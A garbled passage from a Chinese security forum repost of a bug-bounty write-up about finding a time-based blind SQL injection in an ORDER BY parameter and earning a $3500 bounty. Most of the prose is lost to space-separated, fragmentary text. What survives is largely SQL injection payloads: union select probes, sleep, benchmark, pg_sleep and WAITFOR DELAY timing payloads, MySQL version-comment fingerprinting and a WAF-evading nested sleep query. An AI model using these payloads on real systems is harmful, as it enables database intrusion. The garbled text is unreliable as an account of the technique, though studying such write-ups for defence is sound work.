[16378] 2021-01-29_构造基于时间的盲注漏洞(Time-BasedSQLi)

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2021-01-29_构造基于时间的盲注漏洞(Time-BasedSQLi) T i m e - B a s e d   S Q L i c l o u d s   F r e e B u f   2 0 2 1 - 0 1 - 2 9 X S S S Q L I D U R L ? o r d e r = t y p e & o r d e r i n g = A S C & s e a r c h = A S C S E L E C T   *   F R O M   r e f e r r a l s   O R D E R   B Y   t y p e   A S C S Q L o r d e r = t y p e o r d e r = t y p e 5 0 0 S Q L u n i o n s q l ( d u m p   i n   o n e   s h o t   f o r   u n i o n   b a s e d   S Q L   I n j e c t i o n ) u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 1 8 + - o r d e r   b y   1 8 S Q L 西 P a y l o a d O R D E R   B Y   U N I O N   S E L E C T - S E L E C T   *   F R O M   r e f e r r a l s   O R D E R   B Y   t y p e   A S C u n i o n   b a s e d   S Q L   5 0 0 T i m e - B a s e d   S q l
P a y l o a d M y S Q L ,   M S S Q L ,   P o s t g r e S Q L P a y l o a d s l e e p ( 1 0 ) b e n c h m a r k ( 1 0 0 0 0 0 0 0 0 0 , m d 5 ( 1 ) ) p g _ s l e e p ( 1 0 ) ;   W A I T F O R   D E L A Y   0 0 : 0 0 : 1 0 ; P a y l o a d W A F W A F s l e e p ( ) b e n c h m a r k ( )   T i m e - B a s e d   S q l b o o l e a n   b a s e d   b l i n d P a y l o a d - i f ( 1 = 1 , 1 , ( s e l e c t   1   u n i o n   s e l e c t   2 ) ) S Q L 5 0 0 1 = 1 2 0 0 i f ( 1 > 2 , 1 , ( s e l e c t   1   u n i o n s e l e c t   2 ) ) 5 0 0 S E L E C T   *   F R O M   r e f e r r a l s   O R D E R   B Y   ( s e l e c t   1 u n i o n   s e l e c t   2 )   A S C = , <     > P a y l o a d S Q L / ! 5 0 0 0 0 C o m m e n t s / S Q L 5 . 0 0 . 0 0 S Q L P a y l o a d 5 . 0 . 0 / ! 5 0 0 0 0 s o m e I n v a l i d S Q L S y n t a x / 5 0 0 5 . 0 . 0 B u r p   I n t r u d e r P a y l o a d / ! 5 0 7 3 1 s o m e I n v a l i d S Q L S y n t a x /   r e t u r n s   a n   e r r o r   5 0 0 / ! 5 0 7 3 2 s o m e I n v a l i d S Q L S y n t a x /   r e t u r n s   a   s u c c e s s   2 0 0 5 . 7 . 3 1 M y S Q L M y S Q L   5 . 7 . 3 1 s l e e p ( )     b e n c h m a r k ( )   P a y l o a d P a y l o a d - ( s e l e c t * f r o m ( s e l e c t ( s l e e p ( 1 0 ) ) ) a ) s l e e p ( 1 0 ) P a y l o a d - ( s e l e c t * f r o m ( s e l e c t ( s l e e p ( 3 0 ) ) ) a ) s l e e p ( 3 0 )
$ 3 5 0 0

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则